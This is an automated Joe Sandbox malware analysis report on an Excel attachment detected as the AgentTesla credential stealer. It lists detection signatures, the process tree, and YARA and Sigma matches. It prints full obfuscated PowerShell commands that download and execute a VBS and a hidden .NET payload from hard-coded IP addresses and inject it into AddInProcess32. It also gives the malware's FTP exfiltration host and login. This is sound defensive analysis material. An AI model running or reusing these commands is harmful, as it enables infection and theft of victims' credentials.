Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx

Overview

General Information

Sample name:Cuentas bancarias y cdigo ##Swift incorrecto.xla.xlsx
Analysis ID:1467088
MD5:b3b485912e2457ca61dc4481e204385a
SHA1:823436e03fcfc203877217d95fbb6ca3bfb78b31
SHA256:896a8259f8f9e5591c8f6bc3346c0b123a6b50efde85fbe8e913d1ec5af9f3a7
Tags:xlaxlsx
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected AgentTesla
Yara detected Powershell download and execute
Yara detected obfuscated html page
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1704 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 1100 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • cmd.exe (PID: 540 cmdline: "C:\Windows\system32\cmd.exe" "/C poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
        • powershell.exe (PID: 2988 cmdline: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; Iex($(IEX('[SYsTEm.tExt.EncODIng]'+[chAr]58+[CHaR]0X3a+'uTf8.GetSTRInG([SySteM.CONVErT]'+[ChaR]58+[Char]58+'fRomBaSe64StrINg('+[CHAr]0X22+'JHlsc0ozTHU3NyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELXRZUGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1CRXJkRWZpTml0SW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsTU9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwaW1GQ1NhWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEYsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjSFhoVEtzcnBILHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFlLUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdGKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInZTcElNclJ2SXpVIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgU3puVSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHlsc0ozTHU3Nzo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5OC40Ni4xNzguMTQ0L2V2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudmJzIiwiJEVOdjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIiwwLDApO3N0QXJULXNMZUVQKDMpO3N0YVJ0ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGV2ZW5pbmdmaWxlZGF0aW5nbG92ZXIudkJTIg=='+[chAR]34+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
          • csc.exe (PID: 3160 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cboglgly\cboglgly.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
            • cvtres.exe (PID: 3172 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC2C3.tmp" "c:\Users\user\AppData\Local\Temp\cboglgly\CSC66221087E6254F6E92E0F9138CFEC2C1.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • wscript.exe (PID: 3264 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" MD5: 045451FA238A75305CC26AC982472367)
            • powershell.exe (PID: 3324 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • AddInProcess32.exe (PID: 3440 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
{"Exfil Mode": "FTP", "Host": "ftp://ftp.fosna.net", "Username": "madamweb@fosna.net", "Password": "=A+N^@~c]~#I"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\EvengIEcache[1].htaJoeSecurity_ObshtmlYara detected obfuscated html pageJoe Security
    SourceRuleDescriptionAuthorStrings
    0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      0000000E.00000002.618907462.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000E.00000002.619170569.0000000002465000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000C.00000002.510894342.000000001241D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 6 entries
              SourceRuleDescriptionAuthorStrings
              14.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                14.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                  14.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    14.2.AddInProcess32.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                    • 0x34429:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                    • 0x3449b:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                    • 0x34525:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                    • 0x345b7:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                    • 0x34621:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                    • 0x34693:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                    • 0x34729:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                    • 0x347b9:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                    14.2.AddInProcess32.exe.400000.0.unpackMALWARE_Win_AgentTeslaV2AgenetTesla Type 2 Keylogger payloadditekSHen
                    • 0x31623:$s2: GetPrivateProfileString
                    • 0x30cdb:$s3: get_OSFullName
                    • 0x3234c:$s5: remove_Key
                    • 0x324e3:$s5: remove_Key
                    • 0x3347a:$s6: FtpWebRequest
                    • 0x3440b:$s7: logins
                    • 0x3497d:$s7: logins
                    • 0x376f6:$s7: logins
                    • 0x37740:$s7: logins
                    • 0x39095:$s7: logins
                    • 0x382da:$s9: 1.85 (Hash, version 2, native byte-order)
                    Click to see the 9 entries

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1
                    Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 1704, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\EvengIEcache[1].hta
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('Y0ulink = xR'+'mhttp://91.92.254.194/imge/new-image_v.jpg'+'xRm; Y0uwebC'+'lient = New-Object System.Net.WebClient; try { Y0udownlo'+'adedData '+'= Y0uwebClient.DownloadD'+'ata(Y0ulink) } catch { Write-'+'Host xRmFailed To download data from Y0ulinkxRm -ForegroundC'+'olor Red; exit }; if (Y0udownloadedData -ne Y0unull) { Y0uima'+'geText = [System.T'+'ext'+'.Encoding'+']::UTF8.'+'GetString(Y0udownloadedData); Y0ustartFlag = xRm<<B'+'ASE64_START>>xRm; Y0uendFlag = xRm<<BASE64_EN'+'D>>xRm; Y0ustartIndex = Y0uimageText.IndexOf(Y0ustartFlag); Y0uendIn'+'dex = Y0uimageText.IndexOf(Y0uendFlag); if (Y0ustartIndex -ge '+'0'+' -and Y0uendInd'+'ex -gt Y0'+'ustartInde'+'x) { Y0ustartIndex += Y0ustartFlag.Length; Y0ubase64Lengt'+'h = Y0uendIndex - Y0ustartIndex; Y0ubase'+'64Command = Y0uimageText.Su'+'bstring(Y0ustartIndex, Y0ubase64Length); Y0ucommandBytes = [System.Convert]::FromBase64String(Y0ubase64Command); Y0uloadedAssembly = [System.Reflec'+'tion.Assem'+'bly]::L'+'oad(Y0ucommandBytes); Y0utype = Y0uloadedAssembly.GetType(xRm'+'RunPE.Hom'+'exRm); Y0umethod = Y0utype'+'.GetMethod(xRmV'+'AIx'+'Rm).Invoke(Y0unull, [object[]] (xRmtxt.44'+'46sabbbbbbbewmadam/441.871.64.891//:ptthxRm , xRmdesativadoxRm , xRmdesativadoxRm , xRm'+'desativadox'+'Rm,xRmAddInProcess32xRm,xRmxRm)) } }') -rePlacE 'xRm',[ChAR]39 -rePlacE ([ChAR]89+[ChAR]48+[ChAR]117),[ChAR]36)|IEX", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\eveningfiledatinglover.vBS" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: poWersHEll -ex bYPAsS -nOp -W 1 -C deVIcEcrEDENtiAlDePlOyMenT.ExE ; 